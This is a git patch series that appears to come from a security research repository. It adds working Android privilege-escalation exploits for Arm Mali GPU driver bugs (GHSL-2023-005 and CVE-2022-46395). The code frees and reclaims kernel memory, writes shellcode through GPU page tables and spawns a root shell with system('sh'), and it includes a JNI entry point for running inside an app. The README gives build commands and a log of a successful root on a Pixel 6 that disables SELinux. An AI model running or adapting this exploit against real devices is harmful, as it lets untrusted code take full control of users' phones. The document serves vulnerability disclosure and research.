+ args[0] = mali_fd;
+ args[1] = jit_addr2;
+ args[2] = 0;
+
+ pthread_create(&thread, NULL, &shrink_jit_mem, (void*)&(args[0]));
+ g_ready_commit = true;
+ jit_allocate(mali_fd, increase_atom_number(), second_jit_id, POOL_SIZE * 2, GROW_SIZE, 1, 1, (uint64_t)gpu_alloc_addr);
+
+ pthread_join(thread, NULL);
+ if (commit_failed) {
+ close(mali_fd);
+ return -1;
+ }
+ jit_free(mali_fd, increase_atom_number(), second_jit_id);
+ for (int i = 0; i < FLUSH_REGION_SIZE; i++) {
+ union kbase_ioctl_mem_query query = {0};
+ query.in.gpu_addr = jit_addr2;
+ query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
+ flush_regions[i] = flush(i);
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0) {
+ LOG("region freed\n");
+ reclaim_freed_pages(mali_fd);
+ uint64_t start_addr = jit_addr2 + 0x1000 * (512 - FREED_NUM);
+ for (int j = 0; j < FREED_NUM; j++) {
+ write_to(mali_fd, start_addr + j * 0x1000, 0x41 + j, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+ }
+ int idx = -1;
+ uint64_t offset = find_freed_region(&idx);
+ if (offset == -1) {
+ LOG("unable to find region\n");
+ for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE);
+ close(mali_fd);
+ return -1;
+ }
+ LOG("found region %d at %lx\n", idx, start_addr + offset * 0x1000);
+ uint64_t drain = drain_mem_pool(mali_fd);
+ release_mem_pool(mali_fd, drain);
+ munmap((void*)(reclaim_va[idx]), 0x1000);
+ mmap(NULL, 0x1000 * 0x1000, PROT_READ|PROT_WRITE,
+ MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+ map_reserved(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE);
+
+ uint64_t pgd = start_addr + offset * 0x1000;
+ write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
+ run_enforce();
+ cleanup(mali_fd, pgd);
+ return 0;
+ }
+ }
+ close(mali_fd);
+ return -1;
+}
+
+#ifdef SHELL
+
+int main() {
+ setbuf(stdout, NULL);
+ setbuf(stderr, NULL);
+
+ select_offset();
+
+ int mali_fd2 = open_dev(MALI);
+ setup_mali(mali_fd2, 1);
+ setup_tracking_page(mali_fd2);
+ reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ map_gpu(mali_fd2, 1, 1, false, 0);
+ if (!trigger(mali_fd2)) {
+ system("sh");
+ }
+}
+#else
+#include
+JNIEXPORT int JNICALL
+Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thiz)
+{
+ setbuf(stdout, NULL);
+ setbuf(stderr, NULL);
+ select_offset();
+
+ int mali_fd2 = open_dev(MALI);
+ setup_mali(mali_fd2, 1);
+ setup_tracking_page(mali_fd2);
+ reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ map_gpu(mali_fd2, 1, 1, false, 0);
+ if (!trigger(mali_fd2)) {
+ LOG("uid: %d euid %d", getuid(), geteuid());
+ return 0;
+ }
+ return -1;
+}
+#endif
+
diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/midgard.h b/SecurityExploits/Android/Mali/GHSL-2023-005/midgard.h
new file mode 100644
index 0000000..e0ce432
--- /dev/null
+++ b/SecurityExploits/Android/Mali/GHSL-2023-005/midgard.h
@@ -0,0 +1,260 @@
+#ifndef MIDGARD_H
+#define MIDGARD_H
+
+//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define pan_section_ptr(base, A, S) \
+ ((void *)((uint8_t *)(base) + MALI_ ## A ## _SECTION_ ## S ## _OFFSET))
+
+#define pan_section_pack(dst, A, S, name) \
+ for (MALI_ ## A ## _SECTION_ ## S ## _TYPE name = { MALI_ ## A ## _SECTION_ ## S ## _header }, \
+ *_loop_terminate = (void *) (dst); \
+ __builtin_expect(_loop_terminate != NULL, 1); \
+ ({ MALI_ ## A ## _SECTION_ ## S ## _pack(pan_section_ptr(dst, A, S), &name); \
+ _loop_terminate = NULL; }))
+
+
+static inline uint64_t
+__gen_uint(uint64_t v, uint32_t start, uint32_t end)
+{
+#ifndef NDEBUG
+ const int width = end - start + 1;
+ if (width < 64) {
+ const uint64_t max = (1ull << width) - 1;
+ assert(v <= max);
+ }
+#endif
+
+ return v << start;
+}
+
+static inline uint64_t
+__gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end)
+{
+ uint64_t val = 0;
+ const int width = end - start + 1;
+ const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 );
+
+ for (int byte = start / 8; byte <= end / 8; byte++) {
+ val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8);
+ }
+
+ return (val >> (start % 8)) & mask;
+}
+
+enum mali_job_type {
+ MALI_JOB_TYPE_NOT_STARTED = 0,
+ MALI_JOB_TYPE_NULL = 1,
+ MALI_JOB_TYPE_WRITE_VALUE = 2,
+ MALI_JOB_TYPE_CACHE_FLUSH = 3,
+ MALI_JOB_TYPE_COMPUTE = 4,
+ MALI_JOB_TYPE_VERTEX = 5,
+ MALI_JOB_TYPE_GEOMETRY = 6,
+ MALI_JOB_TYPE_TILER = 7,
+ MALI_JOB_TYPE_FUSED = 8,
+ MALI_JOB_TYPE_FRAGMENT = 9,
+};
+
+enum mali_write_value_type {
+ MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1,
+ MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2,
+ MALI_WRITE_VALUE_TYPE_ZERO = 3,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7,
+};
+
+
+struct MALI_WRITE_VALUE_JOB_PAYLOAD {
+ uint64_t address;
+ enum mali_write_value_type type;
+ uint64_t immediate_value;
+};
+
+struct MALI_JOB_HEADER {
+ uint32_t exception_status;
+ uint32_t first_incomplete_task;
+ uint64_t fault_pointer;
+ bool is_64b;
+ enum mali_job_type type;
+ bool barrier;
+ bool invalidate_cache;
+ bool suppress_prefetch;
+ bool enable_texture_mapper;
+ bool relax_dependency_1;
+ bool relax_dependency_2;
+ uint32_t index;
+ uint32_t dependency_1;
+ uint32_t dependency_2;
+ uint64_t next;
+};
+
+
+static inline void
+MALI_JOB_HEADER_pack(uint32_t * restrict cl,
+ const struct MALI_JOB_HEADER * restrict values)
+{
+ cl[ 0] = __gen_uint(values->exception_status, 0, 31);
+ cl[ 1] = __gen_uint(values->first_incomplete_task, 0, 31);
+ cl[ 2] = __gen_uint(values->fault_pointer, 0, 63);
+ cl[ 3] = __gen_uint(values->fault_pointer, 0, 63) >> 32;
+ cl[ 4] = __gen_uint(values->is_64b, 0, 0) |
+ __gen_uint(values->type, 1, 7) |
+ __gen_uint(values->barrier, 8, 8) |
+ __gen_uint(values->invalidate_cache, 9, 9) |
+ __gen_uint(values->suppress_prefetch, 11, 11) |
+ __gen_uint(values->enable_texture_mapper, 12, 12) |
+ __gen_uint(values->relax_dependency_1, 14, 14) |
+ __gen_uint(values->relax_dependency_2, 15, 15) |
+ __gen_uint(values->index, 16, 31);
+ cl[ 5] = __gen_uint(values->dependency_1, 0, 15) |
+ __gen_uint(values->dependency_2, 16, 31);
+ cl[ 6] = __gen_uint(values->next, 0, 63);
+ cl[ 7] = __gen_uint(values->next, 0, 63) >> 32;
+}
+
+
+#define MALI_JOB_HEADER_LENGTH 32
+struct mali_job_header_packed { uint32_t opaque[8]; };
+static inline void
+MALI_JOB_HEADER_unpack(const uint8_t * restrict cl,
+ struct MALI_JOB_HEADER * restrict values)
+{
+ if (((const uint32_t *) cl)[4] & 0x2400) fprintf(stderr, "XXX: Invalid field unpacked at word 4\n");
+ values->exception_status = __gen_unpack_uint(cl, 0, 31);
+ values->first_incomplete_task = __gen_unpack_uint(cl, 32, 63);
+ values->fault_pointer = __gen_unpack_uint(cl, 64, 127);
+ values->is_64b = __gen_unpack_uint(cl, 128, 128);
+ values->type = __gen_unpack_uint(cl, 129, 135);
+ values->barrier = __gen_unpack_uint(cl, 136, 136);
+ values->invalidate_cache = __gen_unpack_uint(cl, 137, 137);
+ values->suppress_prefetch = __gen_unpack_uint(cl, 139, 139);
+ values->enable_texture_mapper = __gen_unpack_uint(cl, 140, 140);
+ values->relax_dependency_1 = __gen_unpack_uint(cl, 142, 142);
+ values->relax_dependency_2 = __gen_unpack_uint(cl, 143, 143);
+ values->index = __gen_unpack_uint(cl, 144, 159);
+ values->dependency_1 = __gen_unpack_uint(cl, 160, 175);
+ values->dependency_2 = __gen_unpack_uint(cl, 176, 191);
+ values->next = __gen_unpack_uint(cl, 192, 255);
+}
+
+static inline const char *
+mali_job_type_as_str(enum mali_job_type imm)
+{
+ switch (imm) {
+ case MALI_JOB_TYPE_NOT_STARTED: return "Not started";
+ case MALI_JOB_TYPE_NULL: return "Null";
+ case MALI_JOB_TYPE_WRITE_VALUE: return "Write value";
+ case MALI_JOB_TYPE_CACHE_FLUSH: return "Cache flush";
+ case MALI_JOB_TYPE_COMPUTE: return "Compute";
+ case MALI_JOB_TYPE_VERTEX: return "Vertex";
+ case MALI_JOB_TYPE_GEOMETRY: return "Geometry";
+ case MALI_JOB_TYPE_TILER: return "Tiler";
+ case MALI_JOB_TYPE_FUSED: return "Fused";
+ case MALI_JOB_TYPE_FRAGMENT: return "Fragment";
+ default: return "XXX: INVALID";
+ }
+}
+
+static inline void
+MALI_JOB_HEADER_print(FILE *fp, const struct MALI_JOB_HEADER * values, unsigned indent)
+{
+ fprintf(fp, "%*sException Status: %u\n", indent, "", values->exception_status);
+ fprintf(fp, "%*sFirst Incomplete Task: %u\n", indent, "", values->first_incomplete_task);
+ fprintf(fp, "%*sFault Pointer: 0x%" PRIx64 "\n", indent, "", values->fault_pointer);
+ fprintf(fp, "%*sIs 64b: %s\n", indent, "", values->is_64b ? "true" : "false");
+ fprintf(fp, "%*sType: %s\n", indent, "", mali_job_type_as_str(values->type));
+ fprintf(fp, "%*sBarrier: %s\n", indent, "", values->barrier ? "true" : "false");
+ fprintf(fp, "%*sInvalidate Cache: %s\n", indent, "", values->invalidate_cache ? "true" : "false");
+ fprintf(fp, "%*sSuppress Prefetch: %s\n", indent, "", values->suppress_prefetch ? "true" : "false");
+ fprintf(fp, "%*sEnable Texture Mapper: %s\n", indent, "", values->enable_texture_mapper ? "true" : "false");
+ fprintf(fp, "%*sRelax Dependency 1: %s\n", indent, "", values->relax_dependency_1 ? "true" : "false");
+ fprintf(fp, "%*sRelax Dependency 2: %s\n", indent, "", values->relax_dependency_2 ? "true" : "false");
+ fprintf(fp, "%*sIndex: %u\n", indent, "", values->index);
+ fprintf(fp, "%*sDependency 1: %u\n", indent, "", values->dependency_1);
+ fprintf(fp, "%*sDependency 2: %u\n", indent, "", values->dependency_2);
+ fprintf(fp, "%*sNext: 0x%" PRIx64 "\n", indent, "", values->next);
+}
+
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_pack(uint32_t * restrict cl,
+ const struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
+{
+ cl[ 0] = __gen_uint(values->address, 0, 63);
+ cl[ 1] = __gen_uint(values->address, 0, 63) >> 32;
+ cl[ 2] = __gen_uint(values->type, 0, 31);
+ cl[ 3] = 0;
+ cl[ 4] = __gen_uint(values->immediate_value, 0, 63);
+ cl[ 5] = __gen_uint(values->immediate_value, 0, 63) >> 32;
+}
+
+
+#define MALI_WRITE_VALUE_JOB_PAYLOAD_LENGTH 24
+#define MALI_WRITE_VALUE_JOB_PAYLOAD_header 0
+
+
+struct mali_write_value_job_payload_packed { uint32_t opaque[6]; };
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_unpack(const uint8_t * restrict cl,
+ struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
+{
+ if (((const uint32_t *) cl)[3] & 0xffffffff) fprintf(stderr, "XXX: Invalid field unpacked at word 3\n");
+ values->address = __gen_unpack_uint(cl, 0, 63);
+ values->type = __gen_unpack_uint(cl, 64, 95);
+ values->immediate_value = __gen_unpack_uint(cl, 128, 191);
+}
+
+static inline const char *
+mali_write_value_type_as_str(enum mali_write_value_type imm)
+{
+ switch (imm) {
+ case MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER: return "Cycle Counter";
+ case MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP: return "System Timestamp";
+ case MALI_WRITE_VALUE_TYPE_ZERO: return "Zero";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_8: return "Immediate 8";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_16: return "Immediate 16";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_32: return "Immediate 32";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_64: return "Immediate 64";
+ default: return "XXX: INVALID";
+ }
+}
+
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_print(FILE *fp, const struct MALI_WRITE_VALUE_JOB_PAYLOAD * values, unsigned indent)
+{
+ fprintf(fp, "%*sAddress: 0x%" PRIx64 "\n", indent, "", values->address);
+ fprintf(fp, "%*sType: %s\n", indent, "", mali_write_value_type_as_str(values->type));
+ fprintf(fp, "%*sImmediate Value: 0x%" PRIx64 "\n", indent, "", values->immediate_value);
+}
+
+struct mali_write_value_job_packed {
+ uint32_t opaque[14];
+};
+
+#define MALI_JOB_HEADER_header \
+ .is_64b = true
+
+#define MALI_WRITE_VALUE_JOB_LENGTH 56
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_TYPE struct MALI_JOB_HEADER
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_header MALI_JOB_HEADER_header
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_pack MALI_JOB_HEADER_pack
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_unpack MALI_JOB_HEADER_unpack
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_print MALI_JOB_HEADER_print
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_OFFSET 0
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_TYPE struct MALI_WRITE_VALUE_JOB_PAYLOAD
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_header MALI_WRITE_VALUE_JOB_PAYLOAD_header
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_pack MALI_WRITE_VALUE_JOB_PAYLOAD_pack
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_unpack MALI_WRITE_VALUE_JOB_PAYLOAD_unpack
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_print MALI_WRITE_VALUE_JOB_PAYLOAD_print
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_OFFSET 32
+
+#endif
From 2c1e4be2af5336fd6d90658feff3c2fd855e8353 Mon Sep 17 00:00:00 2001
From: Man Yue Mo
Date: Fri, 24 Feb 2023 15:14:18 +0000
Subject: [PATCH 09/53] Initial commit
---
.../Android/Mali/CVE_2022_46395/README.md | 54 +
.../Android/Mali/CVE_2022_46395/log_utils.h | 11 +
.../Android/Mali/CVE_2022_46395/mali.h | 1060 ++++++++++++++
.../Mali/CVE_2022_46395/mali_base_jm_kernel.h | 1220 +++++++++++++++++
.../Mali/CVE_2022_46395/mali_user_buf.c | 670 +++++++++
.../Android/Mali/CVE_2022_46395/mem_write.c | 160 +++
.../Android/Mali/CVE_2022_46395/mem_write.h | 27 +
.../Mali/CVE_2022_46395/mempool_utils.c | 61 +
.../Mali/CVE_2022_46395/mempool_utils.h | 19 +
.../Android/Mali/CVE_2022_46395/midgard.h | 260 ++++
10 files changed, 3542 insertions(+)
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/README.md
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/mali.h
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/mali_base_jm_kernel.h
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/mali_user_buf.c
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.c
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.c
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h
create mode 100644 SecurityExploits/Android/Mali/CVE_2022_46395/midgard.h
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/README.md b/SecurityExploits/Android/Mali/CVE_2022_46395/README.md
new file mode 100644
index 0000000..6cafc1a
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/README.md
@@ -0,0 +1,54 @@
+## Exploit for CVE-2022-46395
+
+The write up can be found [here](). This is a bug in the Arm Mali kernel driver that I reported in November 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
+
+The exploit is tested on the Google Pixel 6 with the Novmember 2022 and January 2023 patch. For reference, I used the following command to compile with clang in ndk-21:
+
+```
+android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o mali_user_buf
+```
+
+The exploit should be run a couple of minutes after boot and is likely to have to run for a few minutes to succeed. It is not uncommon to fail the race conditions hundreds of times, although failing the race condition does not have any ill effect and the exploit as a whole rare crashes. If successful, it should disable SELinux and gain root.
+
+```
+oriole:/ $ /data/local/tmp/mali_user_buf
+fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys
+benchmark_time 357
+failed after 100
+failed after 200
+failed after 300
+benchmark_time 343
+failed after 400
+failed after 500
+failed after 600
+benchmark_time 337
+failed after 700
+failed after 800
+failed after 900
+benchmark_time 334
+failed after 1000
+failed after 1100
+failed after 1200
+benchmark_time 363
+failed after 1300
+finished reset: 190027720 fault: 135735849 772 err 0 read 3
+found pgd at page 4
+overwrite addr : 76f6100710 710
+overwrite addr : 76f5f00710 710
+overwrite addr : 76f6100710 710
+overwrite addr : 76f5f00710 710
+overwrite addr : 76f5d00710 710
+overwrite addr : 76f5b00710 710
+overwrite addr : 76f5d00710 710
+overwrite addr : 76f5b00710 710
+overwrite addr : 76f6100fd4 fd4
+overwrite addr : 76f5f00fd4 fd4
+overwrite addr : 76f6100fd4 fd4
+overwrite addr : 76f5f00fd4 fd4
+overwrite addr : 76f5d00fd4 fd4
+overwrite addr : 76f5b00fd4 fd4
+overwrite addr : 76f5d00fd4 fd4
+overwrite addr : 76f5b00fd4 fd4
+result 50
+oriole:/ #
+```
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h b/SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h
new file mode 100644
index 0000000..0a4172c
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h
@@ -0,0 +1,11 @@
+#ifndef LOG_UTILS_H
+#define LOG_UTILS_H
+
+#ifdef SHELL
+#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
+#else
+#include
+#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
+#endif
+
+#endif
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mali.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mali.h
new file mode 100644
index 0000000..3b61e20
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mali.h
@@ -0,0 +1,1060 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2020-2021 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_KBASE_JM_IOCTL_H_
+#define _UAPI_KBASE_JM_IOCTL_H_
+
+#include
+#include
+
+/*
+ * 11.1:
+ * - Add BASE_MEM_TILER_ALIGN_TOP under base_mem_alloc_flags
+ * 11.2:
+ * - KBASE_MEM_QUERY_FLAGS can return KBASE_REG_PF_GROW and KBASE_REG_PROTECTED,
+ * which some user-side clients prior to 11.2 might fault if they received
+ * them
+ * 11.3:
+ * - New ioctls KBASE_IOCTL_STICKY_RESOURCE_MAP and
+ * KBASE_IOCTL_STICKY_RESOURCE_UNMAP
+ * 11.4:
+ * - New ioctl KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET
+ * 11.5:
+ * - New ioctl: KBASE_IOCTL_MEM_JIT_INIT (old ioctl renamed to _OLD)
+ * 11.6:
+ * - Added flags field to base_jit_alloc_info structure, which can be used to
+ * specify pseudo chunked tiler alignment for JIT allocations.
+ * 11.7:
+ * - Removed UMP support
+ * 11.8:
+ * - Added BASE_MEM_UNCACHED_GPU under base_mem_alloc_flags
+ * 11.9:
+ * - Added BASE_MEM_PERMANENT_KERNEL_MAPPING and BASE_MEM_FLAGS_KERNEL_ONLY
+ * under base_mem_alloc_flags
+ * 11.10:
+ * - Enabled the use of nr_extres field of base_jd_atom_v2 structure for
+ * JIT_ALLOC and JIT_FREE type softjobs to enable multiple JIT allocations
+ * with one softjob.
+ * 11.11:
+ * - Added BASE_MEM_GPU_VA_SAME_4GB_PAGE under base_mem_alloc_flags
+ * 11.12:
+ * - Removed ioctl: KBASE_IOCTL_GET_PROFILING_CONTROLS
+ * 11.13:
+ * - New ioctl: KBASE_IOCTL_MEM_EXEC_INIT
+ * 11.14:
+ * - Add BASE_MEM_GROUP_ID_MASK, base_mem_group_id_get, base_mem_group_id_set
+ * under base_mem_alloc_flags
+ * 11.15:
+ * - Added BASEP_CONTEXT_MMU_GROUP_ID_MASK under base_context_create_flags.
+ * - Require KBASE_IOCTL_SET_FLAGS before BASE_MEM_MAP_TRACKING_HANDLE can be
+ * passed to mmap().
+ * 11.16:
+ * - Extended ioctl KBASE_IOCTL_MEM_SYNC to accept imported dma-buf.
+ * - Modified (backwards compatible) ioctl KBASE_IOCTL_MEM_IMPORT behavior for
+ * dma-buf. Now, buffers are mapped on GPU when first imported, no longer
+ * requiring external resource or sticky resource tracking. UNLESS,
+ * CONFIG_MALI_DMA_BUF_MAP_ON_DEMAND is enabled.
+ * 11.17:
+ * - Added BASE_JD_REQ_JOB_SLOT.
+ * - Reused padding field in base_jd_atom_v2 to pass job slot number.
+ * - New ioctl: KBASE_IOCTL_GET_CPU_GPU_TIMEINFO
+ * 11.18:
+ * - Added BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP under base_mem_alloc_flags
+ * 11.19:
+ * - Extended base_jd_atom_v2 to allow a renderpass ID to be specified.
+ * 11.20:
+ * - Added new phys_pages member to kbase_ioctl_mem_jit_init for
+ * KBASE_IOCTL_MEM_JIT_INIT, previous variants of this renamed to use _10_2
+ * (replacing '_OLD') and _11_5 suffixes
+ * - Replaced compat_core_req (deprecated in 10.3) with jit_id[2] in
+ * base_jd_atom_v2. It must currently be initialized to zero.
+ * - Added heap_info_gpu_addr to base_jit_alloc_info, and
+ * BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE allowable in base_jit_alloc_info's
+ * flags member. Previous variants of this structure are kept and given _10_2
+ * and _11_5 suffixes.
+ * - The above changes are checked for safe values in usual builds
+ * 11.21:
+ * - v2.0 of mali_trace debugfs file, which now versions the file separately
+ * 11.22:
+ * - Added base_jd_atom (v3), which is seq_nr + base_jd_atom_v2.
+ * KBASE_IOCTL_JOB_SUBMIT supports both in parallel.
+ * 11.23:
+ * - Modified KBASE_IOCTL_MEM_COMMIT behavior to reject requests to modify
+ * the physical memory backing of JIT allocations. This was not supposed
+ * to be a valid use case, but it was allowed by the previous implementation.
+ * 11.24:
+ * - Added a sysfs file 'serialize_jobs' inside a new sub-directory
+ * 'scheduling'.
+ * 11.25:
+ * - Enabled JIT pressure limit in base/kbase by default
+ * 11.26
+ * - Added kinstr_jm API
+ * 11.27
+ * - Backwards compatible extension to HWC ioctl.
+ * 11.28:
+ * - Added kernel side cache ops needed hint
+ * 11.29:
+ * - Reserve ioctl 52
+ * 11.30:
+ * - Add a new priority level BASE_JD_PRIO_REALTIME
+ * - Add ioctl 54: This controls the priority setting.
+ * 11.31:
+ * - Added BASE_JD_REQ_LIMITED_CORE_MASK.
+ * - Added ioctl 55: set_limited_core_count.
+ */
+#define BASE_UK_VERSION_MAJOR 11
+#define BASE_UK_VERSION_MINOR 31
+
+/**
+ * struct kbase_ioctl_version_check - Check version compatibility between
+ * kernel and userspace
+ *
+ * @major: Major version number
+ * @minor: Minor version number
+ */
+struct kbase_ioctl_version_check {
+ __u16 major;
+ __u16 minor;
+};
+
+#define KBASE_IOCTL_VERSION_CHECK \
+ _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check)
+
+
+/**
+ * struct kbase_ioctl_job_submit - Submit jobs/atoms to the kernel
+ *
+ * @addr: Memory address of an array of struct base_jd_atom_v2 or v3
+ * @nr_atoms: Number of entries in the array
+ * @stride: sizeof(struct base_jd_atom_v2) or sizeof(struct base_jd_atom)
+ */
+struct kbase_ioctl_job_submit {
+ __u64 addr;
+ __u32 nr_atoms;
+ __u32 stride;
+};
+
+#define KBASE_IOCTL_JOB_SUBMIT \
+ _IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit)
+
+#define KBASE_IOCTL_POST_TERM \
+ _IO(KBASE_IOCTL_TYPE, 4)
+
+/**
+ * struct kbase_ioctl_soft_event_update - Update the status of a soft-event
+ * @event: GPU address of the event which has been updated
+ * @new_status: The new status to set
+ * @flags: Flags for future expansion
+ */
+struct kbase_ioctl_soft_event_update {
+ __u64 event;
+ __u32 new_status;
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_SOFT_EVENT_UPDATE \
+ _IOW(KBASE_IOCTL_TYPE, 28, struct kbase_ioctl_soft_event_update)
+
+/**
+ * struct kbase_kinstr_jm_fd_out - Explains the compatibility information for
+ * the `struct kbase_kinstr_jm_atom_state_change` structure returned from the
+ * kernel
+ *
+ * @size: The size of the `struct kbase_kinstr_jm_atom_state_change`
+ * @version: Represents a breaking change in the
+ * `struct kbase_kinstr_jm_atom_state_change`
+ * @padding: Explicit padding to get the structure up to 64bits. See
+ * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
+ *
+ * The `struct kbase_kinstr_jm_atom_state_change` may have extra members at the
+ * end of the structure that older user space might not understand. If the
+ * `version` is the same, the structure is still compatible with newer kernels.
+ * The `size` can be used to cast the opaque memory returned from the kernel.
+ */
+struct kbase_kinstr_jm_fd_out {
+ __u16 size;
+ __u8 version;
+ __u8 padding[5];
+};
+
+/**
+ * struct kbase_kinstr_jm_fd_in - Options when creating the file descriptor
+ *
+ * @count: Number of atom states that can be stored in the kernel circular
+ * buffer. Must be a power of two
+ * @padding: Explicit padding to get the structure up to 64bits. See
+ * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
+ */
+struct kbase_kinstr_jm_fd_in {
+ __u16 count;
+ __u8 padding[6];
+};
+
+union kbase_kinstr_jm_fd {
+ struct kbase_kinstr_jm_fd_in in;
+ struct kbase_kinstr_jm_fd_out out;
+};
+
+#define KBASE_IOCTL_KINSTR_JM_FD \
+ _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_kinstr_jm_fd)
+
+
+#define KBASE_IOCTL_VERSION_CHECK_RESERVED \
+ _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check)
+
+#define KBASE_IOCTL_TYPE 0x80
+
+/**
+ * struct kbase_ioctl_set_flags - Set kernel context creation flags
+ *
+ * @create_flags: Flags - see base_context_create_flags
+ */
+struct kbase_ioctl_set_flags {
+ __u32 create_flags;
+};
+
+#define KBASE_IOCTL_SET_FLAGS \
+ _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)
+
+/**
+ * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel
+ *
+ * @buffer: Pointer to the buffer to store properties into
+ * @size: Size of the buffer
+ * @flags: Flags - must be zero for now
+ *
+ * The ioctl will return the number of bytes stored into @buffer or an error
+ * on failure (e.g. @size is too small). If @size is specified as 0 then no
+ * data will be written but the return value will be the number of bytes needed
+ * for all the properties.
+ *
+ * @flags may be used in the future to request a different format for the
+ * buffer. With @flags == 0 the following format is used.
+ *
+ * The buffer will be filled with pairs of values, a __u32 key identifying the
+ * property followed by the value. The size of the value is identified using
+ * the bottom bits of the key. The value then immediately followed the key and
+ * is tightly packed (there is no padding). All keys and values are
+ * little-endian.
+ *
